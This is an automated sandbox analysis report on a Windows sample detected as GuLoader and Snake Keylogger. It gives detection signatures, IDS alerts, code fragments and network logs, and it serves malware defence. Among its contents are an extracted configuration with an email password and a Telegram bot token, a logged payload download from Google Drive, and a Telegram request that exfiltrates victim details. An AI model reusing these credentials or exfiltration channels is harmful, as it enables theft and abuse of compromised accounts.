Edit tour

Windows Analysis Report
Researches.exe

Overview

General Information

Sample name:	Researches.exe
Analysis ID:	1619372
MD5:	c52b880eb8aaeee90ceddecd2b1ff4f8
SHA1:	98f0771cfcd46fea300f8b93628e3be97a657401
SHA256:	6e24c014d9214bbf4f57d547a64e3b0e8655784094673d97f0cb61cf37470ec6
Tags:	exeguloadervipkeyloggeruser-malwarelabnet
Infos:

Detection

GuLoader, Snake Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected GuLoader

Yara detected Snake Keylogger

Yara detected Telegram RAT

AI detected suspicious PE digital signature

Joe Sandbox ML detected suspicious sample

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected non-DNS traffic on DNS port

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Researches.exe (PID: 4340 cmdline: "C:\Users\user\Desktop\Researches.exe" MD5: C52B880EB8AAEEE90CEDDECD2B1FF4F8)

Researches.exe (PID: 6308 cmdline: "C:\Users\user\Desktop\Researches.exe" MD5: C52B880EB8AAEEE90CEDDECD2B1FF4F8)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-usering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Username": "dalila.russo@novacitacor.pt", "Password": "#Novasystem123#", "Host": "mail.novacitacor.pt", "Port": "587", "Token": "7502066508:AAGz5-yl79jZ7Tfefk024IrMFNLc6CGJF4I", "Chat_id": "6978326966", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000000B.00000002.3541070923.0000000033651000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.2951909943.0000000003D3A000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: Researches.exe PID: 6308	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Researches.exe PID: 6308	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-19T20:36:42.595862+0100	2803305	3	Unknown Traffic	192.168.2.6	57264	104.21.32.1	443	TCP
2025-02-19T20:36:46.448587+0100	2803305	3	Unknown Traffic	192.168.2.6	57268	104.21.32.1	443	TCP
2025-02-19T20:36:49.222346+0100	2803305	3	Unknown Traffic	192.168.2.6	57272	104.21.32.1	443	TCP
2025-02-19T20:36:50.582718+0100	2803305	3	Unknown Traffic	192.168.2.6	57274	104.21.32.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-19T20:36:40.576666+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	57262	132.226.247.73	80	TCP
2025-02-19T20:36:41.982869+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	57262	132.226.247.73	80	TCP
2025-02-19T20:36:43.482859+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	57265	132.226.247.73	80	TCP
2025-02-19T20:36:45.842249+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	57267	132.226.247.73	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-19T20:36:35.737717+0100	2803270	2	Potentially Bad Traffic	192.168.2.6	57260	142.250.181.238	443	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-19T20:36:54.276898+0100	1810007	1	Potentially Bad Traffic	192.168.2.6	57279	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0000000B.00000002.3541070923.0000000033651000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Username": "dalila.russo@novacitacor.pt", "Password": "#Novasystem123#", "Host": "mail.novacitacor.pt", "Port": "587", "Token": "7502066508:AAGz5-yl79jZ7Tfefk024IrMFNLc6CGJF4I", "Chat_id": "6978326966", "Version": "4.4"}

Multi AV Scanner detection for submitted file

Source: Researches.exe	ReversingLabs: Detection: 50%
Source: Researches.exe	Virustotal: Detection: 56%			Perma Link

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36822408 CryptUnprotectData,		11_2_36822408
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36822B60 CryptUnprotectData,		11_2_36822B60

Source: Researches.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:57263 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 192.168.2.6:57264 -> 104.21.32.1:443 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.6:57260 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.6:57261 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:57279 version: TLS 1.2

Source: C:\Users\user\Desktop\Researches.exe

Directory queried: number of queries: 1001

Source: C:\Users\user\Desktop\Researches.exe	Code function: 0_2_00402706 FindFirstFileW,	0_2_00402706
Source: C:\Users\user\Desktop\Researches.exe	Code function: 0_2_00405731 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405731
Source: C:\Users\user\Desktop\Researches.exe	Code function: 0_2_004061E5 FindFirstFileW,FindClose,	0_2_004061E5
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_00402706 FindFirstFileW,	11_2_00402706
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_00405731 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	11_2_00405731
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_004061E5 FindFirstFileW,FindClose,	11_2_004061E5

Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 02D2F9AFh	11_2_02D2F62F
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 36632681h	11_2_366323D0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 36632C48h	11_2_36632830
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 3663FBF0h	11_2_3663F8F8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	11_2_36630673
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 3663E0C9h	11_2_3663DE20
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 3663E9A1h	11_2_3663E6F8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 3663E549h	11_2_3663E2A0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 36632C48h	11_2_36632B76
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 3663EDF9h	11_2_3663EB50
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 3663CE01h	11_2_3663CB58
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 36630D0Dh	11_2_36630B30
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 366316F8h	11_2_36630B30
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 3663C9A9h	11_2_3663C700
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 3663F2A1h	11_2_3663EFF8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	11_2_36630040
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	11_2_36630853
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 3663F6F9h	11_2_3663F450
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 3663D2A9h	11_2_3663D000
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 3663D7F1h	11_2_3663D548
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 3663DC49h	11_2_3663D9A0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 36821B25h	11_2_368217E8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 36822EF0h	11_2_36822C20
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 3682A47Eh	11_2_3682A1B0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 3682CD56h	11_2_3682CA88
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 36821549h	11_2_368212A0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 3682AD9Eh	11_2_3682AAD0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 36828DAEh	11_2_36828AE0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 36826DBEh	11_2_36826AF0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 3682A90Eh	11_2_3682A640
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 3682891Eh	11_2_36828650
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 3682692Eh	11_2_36826660
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 3682724Eh	11_2_36826F80
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 3682525Eh	11_2_36824F90
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 3682D676h	11_2_3682D3A8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 3682EE7Eh	11_2_3682EBB0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 3682B697h	11_2_3682B3F0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 3682D1E6h	11_2_3682CF18
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 3682E9EEh	11_2_3682E720
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 3682B22Eh	11_2_3682AF60
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 3682923Eh	11_2_36828F70
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 36829B5Eh	11_2_36829890
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 36827B6Eh	11_2_368278A0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 36825B7Eh	11_2_368258B0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 3682DF96h	11_2_3682DCC8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 3682F79Eh	11_2_3682F4D0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 3682BFA6h	11_2_3682BCD8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then mov esp, ebp	11_2_36824CF8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 368296CEh	11_2_36829400
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 368276DEh	11_2_36827410
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 368256EEh	11_2_36825420
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 3682DB06h	11_2_3682D838
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 3682F30Eh	11_2_3682F040
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 3682BB16h	11_2_3682B848
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 3682848Eh	11_2_368281C0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 3682649Eh	11_2_368261D0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 36821079h	11_2_36820DD0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 3682C8C6h	11_2_3682C5F8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then mov esp, ebp	11_2_36824D09
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 36829FEEh	11_2_36829D20
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 36827FFEh	11_2_36827D30
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 3682600Eh	11_2_36825D40
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 3682E428h	11_2_3682E158
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 3682FC58h	11_2_3682F960
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 3682C436h	11_2_3682C168
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 36841B20h	11_2_36841828
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 3684AF58h	11_2_3684AC60
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 36842978h	11_2_36842680
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 36847F88h	11_2_36847C90
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 36841190h	11_2_36840E98
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 368467A0h	11_2_368464A8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 36844FB8h	11_2_36844CC0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 3684A5C8h	11_2_3684A2D0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 368437D0h	11_2_368434D8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 36848DE0h	11_2_36848AE8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 36841FE8h	11_2_36841CF0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 3684A100h	11_2_36849E08
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 36843308h	11_2_36843010
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 36848918h	11_2_36848620
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 36847130h	11_2_36846E38
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 36840338h	11_2_36840040
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 36845948h	11_2_36845650
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 36844160h	11_2_36843E68
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 36849771h	11_2_36849478
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 36845480h	11_2_36845188
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 3684AA90h	11_2_3684A798
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 36843C98h	11_2_368439A0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 368492A8h	11_2_36848FB0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 368424B0h	11_2_368421B8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 36847AC0h	11_2_368477C8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 36840CC8h	11_2_368409D0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 368462D8h	11_2_36845FE0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 36844AF0h	11_2_368447F8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 368475F8h	11_2_36847300
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 36840800h	11_2_36840508
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 36845E10h	11_2_36845B18
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 36844628h	11_2_36844330
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 36849C38h	11_2_36849940
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 36842E40h	11_2_36842B48
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 36848450h	11_2_36848158
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 36841658h	11_2_36841360
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then jmp 36846C68h	11_2_36846970
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	11_2_368C90E8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	11_2_368C90F8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:57279 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic

TCP traffic: 192.168.2.6:57102 -> 1.1.1.1:53

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2020/02/2025%20/%2004:19:53%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.32.1 104.21.32.1
Source: Joe Sandbox View	IP Address: 104.21.32.1 104.21.32.1
Source: Joe Sandbox View	IP Address: 132.226.247.73 132.226.247.73

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:57267 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:57265 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:57262 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:57260 -> 142.250.181.238:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:57264 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:57274 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:57268 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:57272 -> 104.21.32.1:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1K_rVVeMRj--1K4Oil07wMr2Liu1M6eVs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1K_rVVeMRj--1K4Oil07wMr2Liu1M6eVs&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:57263 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 192.168.2.6:57264 -> 104.21.32.1:443 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1K_rVVeMRj--1K4Oil07wMr2Liu1M6eVs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1K_rVVeMRj--1K4Oil07wMr2Liu1M6eVs&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
